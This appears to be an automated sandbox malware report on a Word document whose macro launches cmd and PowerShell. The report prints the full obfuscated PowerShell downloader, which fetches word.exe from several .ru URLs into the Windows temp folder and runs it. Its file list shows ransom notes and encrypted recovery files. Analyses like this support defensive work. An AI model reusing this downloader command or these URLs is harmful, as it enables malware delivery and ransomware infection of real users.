	3Update-KB7390-x86.exe	Get hash	malicious	Browse	23.10.249.50

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	Invoice0186.pdf	Get hash	malicious	Browse	192.168.0.40
	P_2038402.xlsx	Get hash	malicious	Browse	192.168.0.44
	bad.pdf	Get hash	malicious	Browse	192.168.0.44
	RFQ.pdf	Get hash	malicious	Browse	192.168.0.44
	100323.pdf	Get hash	malicious	Browse	192.168.0.44
	Copy.pdf	Get hash	malicious	Browse	127.0.0.1
	2.exe	Get hash	malicious	Browse	192.168.0.40
	UPPB502981.doc	Get hash	malicious	Browse	192.168.0.44
	Adm_Boleto.via2.com	Get hash	malicious	Browse	192.168.0.40
	00ECF4AD.exe	Get hash	malicious	Browse	192.168.0.40
	PDF_100987464500.exe	Get hash	malicious	Browse	192.168.0.40
	filedata.exe	Get hash	malicious	Browse	192.168.0.40
	.exe	Get hash	malicious	Browse	192.168.1.60
	33redacted@threatwave.com	Get hash	malicious	Browse	192.168.1.71
unknown	Invoice0186.pdf	Get hash	malicious	Browse	192.168.0.40
	P_2038402.xlsx	Get hash	malicious	Browse	192.168.0.44
	bad.pdf	Get hash	malicious	Browse	192.168.0.44
	RFQ.pdf	Get hash	malicious	Browse	192.168.0.44
	100323.pdf	Get hash	malicious	Browse	192.168.0.44
	Copy.pdf	Get hash	malicious	Browse	127.0.0.1
	2.exe	Get hash	malicious	Browse	192.168.0.40
	UPPB502981.doc	Get hash	malicious	Browse	192.168.0.44
	Adm_Boleto.via2.com	Get hash	malicious	Browse	192.168.0.40
	00ECF4AD.exe	Get hash	malicious	Browse	192.168.0.40
	PDF_100987464500.exe	Get hash	malicious	Browse	192.168.0.40
	filedata.exe	Get hash	malicious	Browse	192.168.0.40
	.exe	Get hash	malicious	Browse	192.168.1.60
	33redacted@threatwave.com	Get hash	malicious	Browse	192.168.1.71

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

WINWORD.EXE (PID: 2296 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)

cmd.exe (PID: 2876 cmdline: c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D); MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 1716 cmdline: powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D); MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

229.exe (PID: 2932 cmdline: 'C:\windows\temp\229.exe' MD5: A76B7140CF6D5C4DC5E0ECFF23FC2CE0)

cleanup

Created / dropped Files

C:\$Recycle.Bin\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1001\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1004\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1005\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\MSOCache\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\PerfLogs\Admin\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\PerfLogs\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Program Files\GUT794C.tmp Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1049116
Entropy (8bit):	7.999821858831486
Encrypted:	true
MD5:	C42F2F26A8BCB0298E1805EB1384123F
SHA1:	35983BEB2F43A344CEB6DFE8202C998909822C4C
SHA-256:	88F54DD5C9F1D83E82621EC930C2161D956032B3C5C5E83857525CB09C5A374D
SHA-512:	D73E7D2A35F541B183CFF8029EFBC1D288F730FA6D707C8E4CFC7DAECBD287D449B0314FAC8CA08168AC5B17117AC05B06269D8A82FA15C87E1E83B76308742A
Malicious:	false
Reputation:	low

C:\Program Files\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Recovery\30698442-3747-11e0-818c-d0aae148ac37\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Recovery\30698442-3747-11e0-818c-d0aae148ac37\Winre.wim Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1049116
Entropy (8bit):	7.999818057282127
Encrypted:	true
MD5:	9E071F52FDAEB90EA0CFBF8AC9CF80D7
SHA1:	024F92BB7DB4F6542BE0C735291A31B5B500D5C7
SHA-256:	EC40989D4083F7A76872AB898549CC6399551C55A5FA0FD958983F2E54003833
SHA-512:	1C6F5CE8D5D98FEC0A13D5FFDE46F68CF1FFC2F5F86A159D6E67A5552ECF40F7CF463E3D23481EF5A9BAEA5749378B30F0BBE91B579EEFDDE750CA2737141FEF
Malicious:	false
Reputation:	low

C:\Recovery\30698442-3747-11e0-818c-d0aae148ac37\boot.sdi Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1049116
Entropy (8bit):	7.999810521075052
Encrypted:	true
MD5:	AF04F5C03B0749CD9E2865FA2BBDD87A
SHA1:	F9250D06AC378D390A1639CF6D1DFE5B94E6424B
SHA-256:	103AC477C01D64C2B66F70E8FB104546ED054FF1D3EFF4017D9997EAB0E1F6EE
SHA-512:	98939E487A3CC24A4D1852F611845DA317DE4060E21CEE5CA091FF1FD3BD11646602F4E2C2C8961BB371CDA51F4E0081472A0C401846C31FCDE884794A67FBE0
Malicious:	false
Reputation:	low

C:\Recovery\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Local\Microsoft\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Local\Microsoft\Windows\History\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Local\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Local\Temp\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Roaming\Media Center Programs\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Roaming\Microsoft\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true
Reputation:	low

C:\Users\Default\AppData\Roaming\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\Default\Desktop\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\Default\Documents\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\Default\Downloads\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\Default\Favorites\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
